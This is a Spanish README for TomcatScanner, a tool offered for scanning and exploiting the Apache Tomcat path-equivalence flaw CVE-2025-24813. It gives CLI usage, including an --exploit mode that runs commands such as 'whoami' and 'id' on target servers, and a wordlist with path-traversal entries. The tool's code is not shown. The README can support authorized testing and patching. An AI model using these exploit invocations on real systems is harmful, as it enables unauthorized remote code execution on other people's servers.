
TomcatScanner es una herramienta de seguridad integral diseñada para detectar y explotar la vulnerabilidad CVE-2025-24813 en servidores Apache Tomcat.
TomcatScanner es una herramienta de seguridad integral diseñada para detectar y explotar la vulnerabilidad CVE-2025-24813 en servidores Apache Tomcat. Esta vulnerabilidad implica un problema de equivalencia de rutas en el parámetro 'file.Name' que puede conducir a la ejecución remota de código (RCE).

git clone https://github.com/yourusername/tomcat-scanner.git
cd tomcat-scanner
pip install -r requirements.txt
El archivo requirements.txt debe incluir:
requests>=2.28.0
urllib3>=1.26.0
Cree un archivo llamado wordlist.txt con las rutas a probar para la vulnerabilidad, o use la muestra de lista de palabras proporcionada.
Escaneo de un solo objetivo:
python tomcat_scanner.py -u http://example.com:8080
Escaneo de múltiples objetivos desde un archivo:
python tomcat_scanner.py -l targets.txt
usage: tomcat_scanner.py [-h] [-u URL] [-l LIST] [-w WORDLIST] [-t THREADS]
[-o OUTPUT] [--timeout TIMEOUT] [--ssl-verify]
[-v] [--exploit] [--command COMMAND]
Scanner for CVE-2025-24813 vulnerability in Apache Tomcat
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Single target URL (e.g., http://example.com:8080)
-l LIST, --list LIST File containing a list of target URLs
-w WORDLIST, --wordlist WORDLIST
Wordlist file containing paths to test (default: wordlist.txt)
-t THREADS, --threads THREADS
Number of parallel threads (default: 10)
-o OUTPUT, --output OUTPUT
Output file for results
--timeout TIMEOUT Request timeout in seconds (default: 5)
--ssl-verify Verify SSL certificates
-v, --verbose Enable verbose mode with HTTP response codes
--exploit Attempt to exploit vulnerable targets
--command COMMAND Test command for exploit mode (default: echo CVE-2025-24813)
Para no solo detectar, sino también explotar la vulnerabilidad:
python tomcat_scanner.py -u http://vulnerable-server.com:8080 --exploit
Especifique un comando personalizado para ejecutar durante la explotación:
python tomcat_scanner.py -u http://vulnerable-server.com:8080 --exploit --command "whoami"
python tomcat_scanner.py -u http://example.com:8080 -w my_wordlist.txt
python tomcat_scanner.py -u http://example.com:8080 -t 20 -v
python tomcat_scanner.py -l target_list.txt -o vulnerable_targets.txt
python tomcat_scanner.py -u http://example.com:8080 --exploit --command "id" -v --timeout 10
TomcatScanner requiere una lista de palabras con las rutas a probar. La lista debe contener rutas potencialmente vulnerables, una por línea.
Ejemplo de entradas de lista de palabras:
/path/uploads/file.name
/webapps/manager/file.name
/tomcat/manager/uploads/file.name
/uploads/../sessions/absholi7ly.session
La herramienta proporciona una salida codificada por colores para identificar fácilmente información importante:
Al final de cada escaneo, la herramienta muestra un resumen con:
CVE-2025-24813 afecta a Apache Tomcat e implica una vulnerabilidad de equivalencia de rutas en la forma en que la aplicación maneja el parámetro 'file.Name'. Esta vulnerabilidad puede permitir a los atacantes:
La vulnerabilidad generalmente se manifiesta cuando se permite que una solicitud PUT escriba en una ruta que contiene "file.name" o cuando es posible el path traversal a través de una operación PUT parcial.
ESTA HERRAMIENTA SE PROPORCIONA ÚNICAMENTE CON FINES EDUCATIVOS Y DE PRUEBAS ÉTICAS.
El uso de TomcatScanner para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no se hacen responsables por el mal uso o daño causado por este programa.
¡Las contribuciones son bienvenidas! No dude en enviar una solicitud de extracción (Pull Request).
Pasos para contribuir:
git checkout -b feature/amazing-feature)git commit -m 'Add amazing feature')git push origin feature/amazing-feature)Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.
MIT License
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files...